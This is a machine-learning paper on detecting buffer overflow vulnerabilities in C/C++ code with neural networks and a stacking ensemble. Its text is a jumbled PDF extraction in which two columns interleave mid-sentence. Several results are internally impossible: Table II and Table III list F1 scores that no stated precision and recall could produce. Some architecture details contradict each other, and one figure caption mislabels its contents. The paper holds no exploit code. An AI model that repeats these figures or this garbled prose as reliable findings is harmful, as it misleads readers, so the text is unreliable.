metrics, anomaly detection, and weak pattern learning [9]. We have examined machine learning-related papers that have Initially, software engineering measures, including software been applied to the software security domain. Previously, complexity [10], developer activity [11], and code commits Zeng et al. [16] reviewed software vulnerability analysis and [12] were investigated to train a machine learning model. This discovery using deep learning techniques. They found four strategy was motivated by the idea that software becomes game-changing methods that contributed most to software more susceptible as it becomes more complicated, but accuracy vulnerability detection using deep learning techniques. These and recall need to be improved. Allamanis et al. [13] have concepts are automatic semantic feature extraction using deep shown that the syntactic and semantic information in the learning models, end-to-end solutions for detecting buffer over- code increases the detection accuracy in anomaly detection. flow vulnerabilities, applying a bidirectional Long Short-Term Moreover, one work has shown the detection of the anomaly Memory (BiLSTM) model for vulnerability detection, and deep using fully-fledged codes [14]. It reveals previously uniden- learning-based vulnerability detectors for binary code. Zhou et tified weaknesses, but false positive and false negative rates al. [17] proposed a method called graph neural network for are high. Another work has shown an approach with clean vulnerability identification with function-level granularity to and vulnerable samples to learn vulnerable patterns [15]. This address the issue of information loss during the representation method performs very well but relies on the quality of the learning process. They transformed the samples into a code dataset. In our work, we propose a solution for detecting property graph format. Then, a graph neural network made software buffer overflow vulnerability using neural networks up of a convolutional layer and a gated graph recurrent layer such as Simple RNN, LSTM, BilSTM, word2vec, BERT, learned the vulnerable programming pattern. This method im- GPT2, and LSTM-Autoencoder. We first transform source code proves the detection of intra-procedural vulnerabilities. How- samples into the minimum intermediate representations through ever, they did not address inter-procedural vulnerabilities. Iorga a tokenizer provided by the Keras library. Later, we extract et al. [18] demonstrated a process for early detection of semantic features using word embedding algorithms such as cyber vulnerabilities from Twitter, building a corpus of 650 GloVe and fastText. After finishing the data preprocessing annotated tweets related to cybersecurity articles. They used stage, we feed the input representation to the neural networks the BERT model and transfer learning model for identifying for classification. Moreover, we develop a neural network that cyber vulnerabilities from the articles. The BERT model shows works best among all the models. All the models have been 91% accuracy, which they found adequate for identifying evaluated using evaluation metrics such as f1 score, precision, relevant posts or news articles. Sauerwein et al. [19] presented recall, accuracy, and total execution time. The following is a an approach for automated classification of attackers’ TTPs summary of our contributions: by combining NLP with ML techniques. They extracted the 1. Extracting semantic and syntactic features using GloVe attackers’ TTPs from unstructured text. To extract the TTPs, and fastText. 2. Vulnerability Detection in Source Code using they used a combination of NLP with ML techniques. They LSTM, BilSTM, LSTM-Autoencoder, word2vec, BERT, and assessed all potential combinations of the specified NLP and GPT-2 with an minimal intermediate feature representation of ML approaches with 156 processing pipelines and an automati- the texts. 3. Vulnerability Detection in Source Code using cally generated training set. They found that tokenization, POS LSTM, BiLSTM, LSTM-Autoencoder, word2vec, BERT, and tagging, IoC replacement, lemmatization, one-hot encoding, GPT-2 with semantic and syntactic features. 4. Proposal of binary relevance, and support vector machine performed best a neural network that outperforms the results derived from for the classification of techniques and tactics. Harer et al. existing models. Comparison between results derived from [20] created a dataset composed of millions of open-source neural networks trained with a minimal intermediate feature functions annotated with results from static analysis. The representation of the texts and semantic and syntactic features. performance of source-based models is then compared against The rest of the paper is organized as follows: we provide a approaches applied to artifacts extracted from the build process, brief background study on software vulnerability detection in with source-based methods coming out on top. The best section 2. Then we explain the methods we followed for our performance is found when combining characteristics learned experimental research in section 3. The results derived from by deep models with tree-based models. They evaluated the use the experiment are demonstrated in Section 4. Finally, section of deep neural network models alongside more conventional 5 concludes the paper. models like random forests. Finally, their best model achieved an area under the ROC curve of 0.87 and an area under II. LITERATURE REVIEW the precision-recall curve of 0.49. Pistoia et al. [21] surveyed static analysis methods for identifying security vulnerabilities Researchers are interested in the recently developed ma- in software systems. They discussed three topics that have chine learning strategy for identifying and preventing soft- been linked to security vulnerability sources: application pro- ware and cybersecurity vulnerabilities in order to address gramming interface conformance, information flow, and access the shortcomings of conventional static and dynamic code control. They addressed static analysis methods for stack-based
analysis techniques. Various machine learning techniques, in- access control and role-based access control separately since cluding naive bayes, logistic regression, recurrent neural net- access control systems can be divided into these two main works (RNN), decision trees, and support vector machines aretypes. They reviewed some effective static analysis techniques, understanding of what kind of important features the dataset including the Mandatory Access Rights Certification of Objects might have. (MARCO) algorithm, the Enterprise Security Policy Evaluation TABLE I: Most common words and their frequencies (ESPE) algorithm, the Static Analysis for Validation of Enter- prise Security (SAVES) algorithm, and Hammer, Krinke, and index Common words Count Snelting’s algorithm. However, static analysis produces false 0 = 505570 positive results and relies on predefined rules. For new errors, the static analysis method is unsuitable, as it cannot recognize 1 if 151663 and detect them. 2 {\n 113301 3 == 92654 III. METHODOLOGY 4 return 77438 From the standpoint of source code, the majority of flaws 5 * 71897 originate in critical processes that pose security risks, such as 6 the 71595 functions, assignments, or control statements. Adversaries can 7 }\n 63182 directly or indirectly affect these crucial operations by manip- 9 int 53673 ulating factors or circumstances. To successfully understand 10 /* 51910 patterns of security vulnerabilities from code, neural network models must be trained on a large number of instances. In this 11 ¡ 43703 study, we analyze the lowest level of codes in software package 12 */\n 43591 functions, capable of capturing vulnerable flows. We utilized a 13 + 41855 sizable dataset containing millions of function-level examples 14 to 39072 of C and C++ code from the SATE IV Juliet Test Suite, the 15 && 36180 Debian Linux distribution, and open-source Git repositories 16 for 35849 on GitHub, as mentioned in Russell’s work [22]. Our project 17 }\n\n 34017 employs the CWE-119 vulnerability feature, which indicates issues related to buffer overflow vulnerability. Buffer overflow 18 char 33334 occurs when data written to a buffer exceeds its length, 19 else 31358 overwriting storage units outside the buffer. According to a 2019 Common Weakness Enumeration report, buffer overflow 1) Data Preprocessing: In this study, we conducted a series vulnerability has become the most adversely affected issue. of data preprocessing techniques to prepare our dataset for Although we focus on buffer overflow, our method can identify the neural networks. The data preprocessing steps we em- other vulnerabilities. Figure 1 illustrates an intra-procedural ployed include tokenization, stop word removal, stemming, buffer overflow vulnerability. Our dataset is divided into three lemmatization, and the use of pre-trained embeddings. Initially, subfolders—train, validation, and test—each containing a CSV we performed tokenization, which is the process of breaking file with 100,000, 20,000, and 10,000 data instances, respec- down the source code into smaller units called tokens. Tokens tively. The CSV files store text data and corresponding labels, represent the basic units of analysis for computational purposes allowing systematic evaluation of the model’s performance and in natural language processing tasks. For this process, we adaptability throughout the learning process. utilized the Keras tokenizer, which provides methods such as tokenize() and detokenize() to process plain text and separate words [23]. Following tokenization, we applied stop word removal, stemming, and lemmatization techniques to further preprocess the tokens. Stop word removal eliminates common words that do not provide significant information, while stem- ming and lemmatization normalize the tokens by reducing them to their root form. These techniques help in reducing noise and improving the efficiency of the neural networks. We first converted the tokens into numerical representations using minimal intermediate representation with the Keras to- kenizer. The Keras tokenizer assigns a unique integer index to each token in the vocabulary and represents the source code as a sequence of these integer indices. This represen- Fig. 1: An example of buffer overflow vulnerability. tation is more efficient than one-hot encoding, as it does not involve creating large, sparse vectors. However, it still lacks semantic information about the tokens. To further enhance the We analyzed the dataset and found some common words representation of the source code tokens and better capture (shown in Table 1) with their corresponding counts. The visual- semantic and syntactic information, we utilized pre-trained ization of common words in the dataset provides a preliminary embeddings, namely GloVe and fastText. We stacked GloVeand fastText embeddings together for extracting the semantic gradient problem of traditional RNNs.It was first proposed and syntactic information from the source code. Both of these by Hochreiter and Schmidhuber [27]. Using this model for embeddings have demonstrated strong performance in various sequential datasets is effective, as it can handle single data NLP tasks and can effectively capture the relationships between points. It follows the Simple RNN model’s design and is an words in the source code. GloVe is an unsupervised learning extended version of that model [28, 29]. Our LSTM model algorithm that generates vector representations of words based consists of an input layer that determines the dimensionality on global word-word co-occurrence statistics from a corpus of the input data features. We incorporated three hidden layers, [24]. FastText, an extension of the skip-gram method, generates each containing 128 memory cells that can capture long-term character n-grams of varying lengths for each word and learns dependencies in the input sequence. The output of each LSTM weights for each n-gram, as well as the entire word token, layer is fed into a dropout layer with a dropout rate of 0.2 to
allowing the model to capture the meaning of suffixes, prefixes, prevent overfitting. The final output of the last LSTM layer is and short words [25]. We separately fed the minimal inter- fed into a dense layer with two units and a sigmoid activation mediate representation with Keras tokenizer and the semantic function to produce the final binary classification output. The and syntactic representations derived from GloVe and fastText LSTM cell comprises three gates: the input gate, forget gate, into our neural network models. This approach allowed us to and output gate, which regulate the flow of information into compare the performance of the models when using different and out of the cell. To introduce non-linearity into the model, input representations, helping us identify the most effective we use the hyperbolic tangent (tanh) activation function in method for detecting security vulnerabilities in the source code. the LSTM cell. Furthermore, we utilize the Rectified Linear Unit (ReLU) activation function in the output layer to generate A. Classification Models non-negative predictions. We optimize the LSTM model using In this section, we discuss various classification models that the Binary Cross-Entropy loss function and Adam optimization were utilized in our study. These models include Simple RNN, algorithm. The model’s hyperparameters include a learning rate LSTM, BiLSTM, LSTM-Autoencoder, Word2vec, BERT, and of 0.001, batch size of 32, and 50 training epochs. GPT-2. These models are designed to work with different types of data, such as text, time series, and sequences, and have D. Bidirectional Long short-term memory (BiLSTM) been widely employed in natural language processing and other The Bidirectional Long Short-Term Memory (BiLSTM) is a related tasks. type of recurrent neural network that enhances the capabilities B. Simple Recurrent Neural Network (RNN) of the traditional LSTM by introducing bidirectional processing of the input sequence. It was first proposed by Graves [30]. The Simple Recurrent Neural Network (RNN) is a type of This idea sets it apart from the LSTM model, which can learn artificial neural network that can model sequential data by patterns from the past to the future [31] .Our BiLSTM model utilizing a directed graph and temporally dynamic behavior. comprises an input layer that determines the dimensionality RNNs consist of an input layer, a hidden layer, and an output of the input data features. We have incorporated three hidden layer [26]. These networks have a memory state added to each layers, each containing 128 memory cells that can capture long- neuron, allowing them to capture temporal dependencies in the term dependencies in the input sequence. The output of each data. The dimensionality of the input layer in our Simple Re- BiLSTM layer is fed into a dropout layer with a dropout rate of current Neural Network (RNN) model is determined based on 0.2 to prevent overfitting. The final output of the last BiLSTM the input data features. The hidden layer consists of 256 units, layer is fed into a dense layer with two units and a sigmoid which use memory states to capture temporal dependencies activation function to produce the final binary classification in the data. We use the hyperbolic tangent (tanh) activation output. The BiLSTM cell has two sets of three gates, namely function in the hidden layer to introduce non-linearity into the input gate, forget gate, and output gate, one set that the model. We chose this activation function due to its ability processes the input sequence in the forward direction and to handle vanishing gradients more effectively compared to another set that processes the input sequence in the backward other activation functions like sigmoid. The output layer of direction. This bidirectional processing allows the model to the Simple RNN model is designed to generate predictions capture dependencies in both the past and future context of based on the processed input data. The number of units in the input sequence. To introduce non-linearity into the model, the output layer corresponds to the number of classes, which we use the hyperbolic tangent (tanh) activation function in the is two. We use an appropriate activation function, such as BiLSTM cell. Furthermore, we utilize the Rectified Linear Unit sigmoid for binary classification, in the output layer to generate (ReLU) activation function in the output layer to generate non- probability scores for each class. To optimize the model, we negative predictions. We optimize the BiLSTM model using choose the Binary Cross entropy loss function and employ the the Binary Cross-Entropy loss function and Adam optimization Adam optimization algorithm. We set hyperparameters such as algorithm. The model’s hyperparameters include a learning rate learning rate to 0.001, batch size to 32, and the number of of 0.001, batch size of 32, and 50 training epochs. training epochs to 50. C. Long short-term memory (LSTM) E. LSTM-Autoencoder The Long Short-Term Memory (LSTM) is a type of recurrent The LSTM-Autoencoder is a variant of the Long Short- neural network designed to solve the vanishing and exploding Term Memory (LSTM) model that utilizes an autoencoderarchitecture. The LSTM-Autoencoder is designed to read input We set the batch size to 128 and the number of training epochs sequences, encode sequences, decode sequences, and recon- to 5. struct sequences for a given sequential dataset, referred to G. BERT as encoder-decoder [32]. Its performance is estimated based on how well the model can recreate the sequence. LSTM BERT (Bidirectional Encoder Representations from Trans- autoencoder can be used on video, text, audio, and time-series formers) is a state-of-the-art pre-trained language model de- sequence data. The model accepts a series of various lengths veloped by Google. BERT is a bidirectional transformer-based of inputs and outputs for various purposes, such as translating architecture that can capture the context of a word in a sentence
from one language to another. The series is transformed into by looking at the surrounding words [34]. The BERT model a vector representation by the encoder, and the vector is consists of 12 transformer blocks for the base version and transformed back into a sequence of outputs or texts by the 24 transformer blocks for the large version. Each transformer decoder. The meaning of the outputs is maintained in the block has a multi-head attention mechanism and a feed-forward vector representation. In this model, we have an input layer neural network, making it capable of modeling long-term that determines the dimensionality of the input data features. dependencies in the input sequence. In our implementation of The LSTM encoder layer contains 128 memory cells that can BERT, we utilized the pre-trained BERT model and fine-tuned capture long-term dependencies in the input sequence. The it on our specific NLP task. We utilized the pre-trained BERT LSTM decoder layer has the same number of memory cells model with 12 transformer blocks, 12 attention heads, and 110 as the encoder layer, which allows the model to reconstruct million parameters. We added a dense layer with 2 units and the input sequence. To introduce non-linearity into the model, a sigmoid activation function to perform binary classification. we use the hyperbolic tangent (tanh) activation function in the We utilized the Binary Cross-Entropy loss function and Adam LSTM cells. Additionally, we utilize the Mean Squared Error optimization algorithm to optimize the model. We set the (MSE) loss function to calculate the reconstruction loss of the learning rate to 2e-5 and the batch size to 32. To fine-tune the autoencoder. The model’s hyperparameters include a learning pre-trained BERT model, we trained it on our specific NLP rate of 0.001, batch size of 32, and 50 training epochs. To eval- task using a training set of 100,000 instances and a validation uate the performance of the LSTM-Autoencoder, we calculate set of 20,000 instances. We trained the model for 3 epochs and the reconstruction error between the input and reconstructed evaluated its performance on a separate test set, which constists sequence. The lower the reconstruction error, the better the of 10,000 instances. model’s ability to capture the input sequence’s structure. H. GPT-2 GPT-2 (Generative Pre-trained Transformer 2) is a state- F. Word2vec of-the-art language model developed by OpenAI. It is a transformer-based language model that can generate coherent Word2vec is a word embedding model specifically designed and fluent text in a wide range of styles and topics [35]. GPT- for working with textual data. Word embedding is a tech- 2 has a large number of parameters, with the base version nique for representing words that allows computer programs having 117 million parameters, and the largest version having to understand words with similar meanings. By employing 1.5 billion parameters. In our implementation of GPT-2, we a neural network model to map words into vectors of real utilized the pre-trained GPT-2 model to generate text for our numbers, word2vec is capable of capturing significant accurate specific NLP task. We fine-tuned the pre-trained GPT-2 model syntactic and semantic word relationships. After training, the on a large corpus of text relevant to our task to improve its two-layer neural network can recognize synonymous terms and performance. We used the GPT-2 model with 117 million suggest new words for incomplete phrases [33]. Our Word2vec parameters for our task. To fine-tune the pre-trained GPT-2 model comprises an input layer that takes in the one-hot model, we used a training set of 100,000 instances and a encoded words and a single hidden layer containing a specified validation set of 20,000 instances. We fine-tuned the model number of neurons, which represent the latent dimensions of for 3 epochs and evaluated its performance on a separate test the word embeddings. We utilize the Skip-gram architecture set. We used the perplexity metric to evaluate the performance with negative sampling to train the Word2vec model. In this of the model. We utilized the Adam optimization algorithm architecture, the model predicts the surrounding words given with a learning rate of 1e-5 and a batch size of 32 to optimize a target word or predicts the target word given surrounding the model. words. The negative sampling technique helps to efficiently I. Proposed Model train the model by reducing the computation required to update the weights of the model. The output layer is not used in the We propose a stacking ensemble learning approach to im- Word2vec model, and the trained weights of the hidden layer prove the performance of our system. Stacking ensemble is an represent the learned word embeddings. These embeddings advanced machine learning technique that combines multiple can be used in various downstream NLP tasks such as text heterogeneous weak learners (base models) to form a single classification, sentiment analysis, and machine translation. To stronger model (meta-learner). In this approach, the base mod- optimize the model, we use the Stochastic Gradient Descent els’ predictions are used as input to the meta-learner, which (SGD) optimization algorithm with an initial learning rate of ultimately makes the final prediction. The meta-learner used 0.025 and decrease the learning rate linearly over time to 0.001. in this case is a logistic regression model, while the basemodels consist of Simple RNN, LSTM, BiLSTM, word2vec, prediction yfinal for the i-th sample can be computed using i and LSTM-Autoencoder. These models are trained with one- the logistic function: dimensional data as input. Since the predicted dataset from Level 0 already contains the expected values’ probabilities, the meta-learner can provide accurate probabilities from Level 0. To mitigate overfitting, the meta-learner is trained using both the validation dataset and the
outputs. The final result is the level-1 prediction. yfinal = 1 i 1 + e−(pw i eighted) Fig. 2: Proposed stacking ensemble learning architecture. The architecture is divided into two levels, Level 0 and Level 1, as shown in Figure 2. Level 0 consists of Simple RNN, LSTM, BiLSTM, word2vec, and LSTM-Autoencoder models. After learning the data patterns, each of the base models generates predictions simultaneously. All models in Level 0 contribute equally to the overall model performance. Level 1, also referred to as the meta-learner, is built using logistic regression. The meta-learner at Level 1 is fed the Level 0 predicted outputs as input. Based on the Level 0 predictions, the meta-learner calculates the best weighted outputs. A “meta- learner” is a model that can quickly learn a pattern or adapt to different datasets with a small amount of training data. It learns By using a diverse set of base models, we can mitigate patterns from the outputs generated by the five base models. As the limitations of traditional stacking ensemble approaches that a result, the model can effectively learn completely new data employ similar base models, leading to similar predictions. If and produce acceptable output. The meta-learner’s parameters a single base model performs poorly on the dataset, there is are a combination of the parameters of the five neural networks a high likelihood that the final output will also be inferior. in the base models. Conversely, with a diverse set of base models, the strengths Mathematically, the stacking ensemble learning approach and weaknesses of individual models complement each other, can be represented as follows: Let M be the number of base models, pm be the probability which results in a more robust and accurate overall model. i This is because each base model is able to capture different of the positive class for the i-th sample predicted by the m-th aspects or patterns in the data, thereby reducing the reliance on base model, and w be the weight assigned to the m-th base m any single model’s performance. Additionally, the meta-learner model. The weighted probability pweighted for the i-th sample i can effectively combine these diverse predictions to generate can be computed as: a more accurate and stable final prediction, minimizing the impact of individual model biases or errors. In conclusion, XM pw eighted = w · p m the utilization of heterogeneous base models in a stacking i m i ensemble approach provides a more resilient and powerful m=1 predictive model, capable of handling various types of data The weights w are determined by the meta-learner using and delivering superior performance compared to traditional m the Level 0 predictions and the validation data. The final ensemble methods.Algorithm 1 Proposed Stacking Ensemble Learning Algo- metrics contributes to a comprehensive understanding of the rithm. model’s effectiveness, generalization, and efficiency [36–38]. Function stacking_ensemble(data, train ratio, Below, we provide a brief description of each evaluation metric: val ratio, test ratio) // Initialize Level 0 base models A. Precision simple rnn ← SimpleRNN(); Precision is a measure of the accuracy of the positive lstm ← LSTM(); predictions made by the model. It is calculated as the ratio of bi lstm ← BiLSTM(); true positive predictions to the sum of true positive and false lstm autoencoder ← LSTM Autoencoder(); positive predictions. In other words, it quantifies the proportion word2vec model ← Word2Vec(); of correct positive predictions among all the instances predicted models ← [simple rnn, lstm, bi lstm, as positive. A higher precision value indicates that the model lstm autoencoder, word2vec model]; is better at identifying relevant instances and minimizing false // Initialize Level 1 meta-learner positive predictions. meta learner ← LogisticRegression() True Positives Precision = (1) True Positives + False Positives // Split the data into training, validation, and testing sets B. Recall X train, X val, X test, y train, y val, y test ← Recall, also known as sensitivity or true positive rate, data split(data, train ratio, val ratio, test ratio) measures the proportion of actual positive instances that are correctly identified by the model. It is calculated as the ratio of // Train Level 0 base models true positive predictions to the sum of true positive and false foreach model in models do negative predictions. A higher recall value indicates that the model.fit(X train, y train) model is better at detecting positive instances and minimizing // Make predictions with Level 0 base false negative predictions. models True Positives Level0 outputs ← list() Recall = (2) True Positives + False Negatives foreach model in models do pred ← model.predict(X val) C. F1-score Level0 outputs.append(pred) F1-score is the harmonic mean of precision and recall, and it // Concatenate Level 0 outputs provides a balanced measure of both metrics. It is particularly Level0 outputs combined ← concate- useful when dealing with imbalanced datasets, where one class nate(Level0 outputs) is significantly more prevalent than the other. The F1-score ranges from 0 to 1, with a higher value indicating better overall // Train Level 1 meta-learner performance of the model in terms of both precision and recall. meta learner.fit(Level0 outputs combined, y val) F1-score = 2 · Precision · Recall (3) // Make final predictions with Level 1 Precision + Recall meta-learner D. Accuracy Level0 test outputs ← list() Accuracy is a widely-used metric that quantifies the propor- foreach model in models do tion of correct predictions made by the model, both positive and test pred ← model.predict(X test) negative, relative to the total number of instances. It provides Level0 test outputs.append(test pred)
an overall indication of the model’s performance, but it may // Concatenate Level 0 test outputs not be a reliable metric when dealing with imbalanced datasets, Level0 test outputs combined ← concate- as it can be biased towards the majority class. nate(Level0 test outputs) True Positives + True Negatives Accuracy = (4) // Generate Level 1 final predictions Total Instances final predictions ← meta learner.predict(Level0 test outputs)E. Execution Time return final predictions Execution time is a measure of the computational efficiency of the model. It refers to the amount of time required to train the model and make predictions. A shorter execution IV. EVALUATION METRICS time indicates that the model is more efficient, which can be In order to assess the performance of the Neural Networks particularly important in real-world applications where time and our proposed stacking ensemble model, we have employed constraints are critical. By evaluating the execution time, we a range of evaluation metrics that provide insight into various can assess the trade-offs between model performance and aspects of model performance. These metrics include precision, computational resources. These evaluation metrics provide a recall, F1-score, accuracy, and execution time. Each of these comprehensive and robust assessment of our neural networkand proposed model’s performance. By considering multiple 0.92, 0.92, 0.93, and 0.94. The LSTM Autoencoder model’s aspects of performance, we can ensure that our model is not performance slightly decreased with an accuracy of 0.90. The only accurate but also efficient, generalizable, and reliable BERT, GPT-2, and proposed models maintain their superior across various datasets and application scenarios. performance, with accuracies of 0.94, 0.95, and 0.95, re- spectively. The execution times for all models vary, with the V. RESULT AND DISCUSSION proposed model having a runtime of 2 hours and 46 minutes. Figure 3 shows the performance metrics for different neural In this study, we investigated the role of semantic and syntac- network models on vulnerable source code without using any tic features in vulnerability prediction for CWE-119, focusing word embedding algorithms. The models considered are Sim- on buffer overflow vulnerabilities. We began by converting ple RNN, LSTM, BiLSTM, Word2vec, LSTMAutoencoder, the text dataset into a minimal intermediate representation BERT, GPT-2, and a proposed model. The metrics considered using a tokenizer provided by the Keras library. This basic are accuracy, precision, recall, and F1 score. The results representation assigns a numerical value to each word with- demonstrate that the proposed model outperforms all other out considering semantic information. Since the meaning of models in terms of accuracy and F1 score, achieving an code is often better captured by considering the context of accuracy of 0.94 and an F1 score of 0.99. The execution time multiple words, we employed state-of-the-art word embedding of the proposed model is also relatively fast compared to other algorithms—GloVe and fastText—to extract semantic features from function-level codes. These features were then fed into models, taking only 2 hours and 31 minutes. neural network models for vulnerability prediction. We used Figure 4 presents the classification results of the same neural 100,000 instances for training, 20,000 for validation, and network models on vulnerable source code using GloVe and 10,000 for testing. Our evaluation metrics included accuracy, fastText word embedding algorithms. The results demonstrate precision, recall, and F1 score, with a focus on minimizing false that all models achieved higher accuracy and F1 score com- positives and false negatives. We trained seven neural network pared to the results in Figure 3. The proposed model continues models (Simple RNN, LSTM, BiLSTM, word2vec, BERT, to perform the best with an accuracy of 0.95 and an F1 score GPT-2, and LSTM-Autoencoder) and our proposed stacking of 0.99. However, the execution time of the proposed model is ensemble neural network model. Our ensemble learning model longer compared to Figure 3, taking 2 hours and 46 minutes. outperformed single models, achieving the highest accuracy in These figures provide a clear comparison of the performance vulnerability prediction. of different neural network models and highlight the effective- Table 2 presents the results of vulnerable source code ness of using word embedding algorithms for improving the classification using different neural network models without classification results of vulnerable source code. The proposed word embedding algorithms. The Simple RNN model achieves model performs well in both scenarios, showing its potential an accuracy of 0.89, precision of 0.88, recall of 0.88, and F1 as a reliable classification model. score of 0.92, with an execution time of 42 minutes and 8 In Table 4, we present a comparison analysis between seconds. The LSTM model has slightly better performance with our proposed model and previous works in the domain of an accuracy of 0.90, precision of 0.90, recall of 0.90, and F1 vulnerability detection. The table highlights the differences in score of 0.92, and takes 29 minutes and 48 seconds to run. terms of the purpose of each study, the data used, whether The BiLSTM model shows further improvement, obtaining an semantic or syntactic feature extraction was performed, the accuracy of 0.91, precision of 0.93, recall of 0.90, and F1 score highest performance achieved, and if efficiency measurements of 0.87, but requires 2 hours and 5 minutes for execution. were conducted. The Word2vec model yields an accuracy of 0.89, precision Lorga et al. [18] aimed at vulnerability detection using of 0.92, recall of 0.95, and F1 score of 0.93, with a runtime of Twitter text data, but they did not perform semantic or syn-
40 minutes and 2 seconds. The LSTM Autoencoder model has tactic feature extraction. Their model achieved an accuracy of an accuracy of 0.91, precision of 0.93, recall of 0.94, and F1 94.96%, and they did not provide any efficiency measurements. score of 0.94, taking 53 minutes and 13 seconds for execution. Similarly, Foret et al. [39] worked on vulnerability detection The BERT model performs better with an accuracy of 0.92, using news articles without incorporating semantic or syntactic precision of 0.93, recall of 0.93, and F1 score of 0.95, but features, resulting in an 87% accuracy. No efficiency measure- requires 2 hours and 38 minutes to run. The GPT-2 model has ment analysis was conducted in their work as well. Harer et an accuracy of 0.92, precision of 0.97, recall of 0.98, and F1 al. [20] and Russell et al. [22] both focused on vulnerability score of 0.97, with a considerably longer execution time of 7 detection in source code but did not consider semantic or hours and 48 minutes. Lastly, the proposed model outperforms syntactic feature extraction. Their models achieved F1-scores the other models with an accuracy of 0.94, precision of 0.99, of 49.99% and 56.6%, respectively, without any efficiency recall of 0.98, and F1 score of 0.99, and takes 2 hours and 31 measurement analysis. Behzadan et al. [40] also worked on vul- minutes to execute. nerability detection in source code without extracting semantic Table 3 shows the results when using GloVe and Fast- or syntactic features. They reported an accuracy of 94.72%, Text embeddings. In general, the performance of all models but no efficiency measurement analysis was performed. improved when using these embeddings. The Simple RNN, Our proposed model targets vulnerability detection in source LSTM, BiLSTM, and Word2vec models show a similar trend code and incorporates semantic and syntactic feature extraction in improvement, with their respective accuracies increasing to using GloVe and fastText embeddings. As a result, our modelTABLE II: Vulnerable Source code Classification results using different Neural network models with no word embedding algorithms Models Accuracy precision Recall F1 Execution Score Time Simple RNN 0.89 0.88 0.88 0.92 42min 8s LSTM 0.90 0.90 0.90 0.92 29min 48s BiLSTM 0.91 0.93 0.90 0.87 2h 5min Word2vec 0.89 0.92 0.95 0.93 40min 2s LSTMAutoencoder 0.91 0.93 0.94 0.94 53min 13s BERT 0.92 0.93 0.93 0.95 2h 38min Gpt2 0.92 0.97 0.98 0.97 7h 48min Proposed Model 0.94 0.99 0.98 0.99 2h 31min TABLE III: Vulnerable Source code Classification results using different Neural network models with embedding algorithms GloVe + fastText Models Accuracy precision Recall F1 Execution Score time Simple RNN 0.92 0.93 0.93 0.97 42min 8s LSTM 0.92 0.93 0.95 0.97 33min 13s BiLSTM 0.93 0.96 0.96 0.99 45min 3s Word2vec 0.94 1.00 0.98 0.99 42min 56s LSTMAutoencoder 0.90 0.93 0.94 0.95 59min 53s BERT 0.94 0.95 0.95 0.99 5h 16min Gpt2 0.95 0.97 0.98 0.99 8h 33min Proposed Model 0.95 0.97 0.98 0.99 2h 46min TABLE IV: Comparative analysis with previous work Previous authors Purpose Data Semantic or Syn- Highest percent- Efficiency Mea- tactic feature ex- age surement? traction? Lorga et al. [18] Vulnerability detection Twitter text No 94.96% No data (Accuracy) Foret et al. [39] Vulnerability detection News No 87% (Accuracy) No Articles Harer et al. [20] Vulnerability detection Source code No 49.99% (F1- No score) Russell et al. [22] Vulnerability detection Source code No 56.6% (F1-score) No Behzadan et al. Vulnerability detection Source code No 94.72% No [40] (Accuracy) Our Proposed Vulnerability detection Source code Yes 95% (Accuracy) Yes Model achieves the highest accuracy of 95% compared to the previ- VI. CONCLUSION ous works. Moreover, we contribute to efficient measurement Our research aims to detect implementation vulnerabilities analysis and perform an in-depth analysis of the features that early in the development cycle by leveraging the power of were not considered in previous studies. This comprehensive neural networks. We have collected a large dataset of open- approach allows us to better understand the factors influencing source C and C++ code and developed a scalable and efficient the performance of vulnerability detection models and develop vulnerability detection method based on various neural network more effective methods for detecting security vulnerabilities in models. We compared the performance of different models, source code. including Simple RNN, LSTM, BiLSTM, LSTM-Autoencoder,Fig. 3: Performance Metrics for Different Neural Network Models on Vulnerable Source Code without Word Embedding Algorithms Word2Vec, BERT, and GPT-2, and found that models with ceedings of the 28th international conference on Software semantic and syntactic information extracted using state-of-the- engineering, pp. 492–501, 2006. art word embedding algorithms such as GloVe and FastText [2] T. Manikandan, B. Balamurugan, C. Senthilkumar, outperform those with a minimal text representation. Our R. R. A. Harinarayan, and R. R. Subramanian, “Cyberwar proposed neural network model has shown to provide higher is coming,” Cyber Security in Parallel and Distributed accuracy with greater efficiency than the other models evalu- Computing: Concepts, Techniques, Applications and Case ated. We have also analyzed the execution time of the models Studies, pp. 79–89, 2019.
and proposed a trade-off between accuracy and efficiency. [3] A. Arora and R. Telang, “Economics of software vulnera- Overall, our research contributes to the development of large- bility disclosure,” IEEE security & privacy, vol. 3, no. 1, scale machine learning systems for function-level vulnerability pp. 20–25, 2005. identification in source code auditing. [4] K. Jochem, “It security matters,” [5] “cisa.” https://www.cisa.gov/ ACKNOWLEDGEMENT news-events/alerts/2021/06/30/ The work is supported by the National Science Founda- printnightmare-critical-windows-print-spooler-vulnerability, tion under NSF Award #2209638, #2100115, #2209637, 2022. Accessed April 26, 2023. #2100134, #1663350. Any opinions, findings, recommenda- [6] T. N. Brooks, “Survey of automated vulnerability de- tions, expressed in this material are those of the authors and tection and exploit generation techniques in cyber rea- do not necessarily reflect the views of the National Science soning systems,” in Science and Information Conference, Foundation. pp. 1083–1102, Springer, 2018. REFERENCES [7] C. Cadar, D. Dunbar, D. R. Engler, et al., “Klee: unas- sisted and automatic generation of high-coverage tests for [1] T. D. LaToza, G. Venolia, and R. DeLine, “Maintaining complex systems programs.,” in OSDI, vol. 8, pp. 209– mental models: a study of developer work habits,” in Pro-Fig. 4: Performance Metrics for Different Neural Network Models on Vulnerable Source Code without Word Embedding Algorithms 224, 2008. code audits,” in Proceedings of the 22nd ACM SIGSAC [8] T. A. Henzinger, R. Jhala, R. Majumdar, and G. Sutre, Conference on Computer and Communications Security, “Software verification with blast,” in International SPIN pp. 426–437, 2015. Workshop on Model Checking of Software, pp. 235–239, [13] M. Allamanis, E. T. Barr, P. Devanbu, and C. Sutton, “A Springer, 2003. survey of machine learning for big code and naturalness,” [9] S. M. Ghaffarian and H. R. Shahriari, “Software vul- ACM Computing Surveys (CSUR), vol. 51, no. 4, pp. 1– nerability analysis and discovery using machine-learning 37, 2018. and data-mining techniques: A survey,” ACM Computing [14] S. Wang, D. Chollak, D. Movshovitz-Attias, and L. Tan, Surveys (CSUR), vol. 50, no. 4, pp. 1–36, 2017. “Bugram: bug detection with n-gram language models,” in [10] A. Younis, Y. Malaiya, C. Anderson, and I. Ray, “To fear Proceedings of the 31st IEEE/ACM International Confer- or not to fear that is the question: Code characteristics ence on Automated Software Engineering, pp. 708–719, of a vulnerable functionwith an existing exploit,” in 2016. Proceedings of the sixth ACM conference on data and [15] G. Grieco, G. L. Grinblat, L. Uzal, S. Rawat, J. Feist, and application security and privacy, pp. 97–104, 2016. L. Mounier, “Toward large-scale vulnerability discovery [11] Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, using 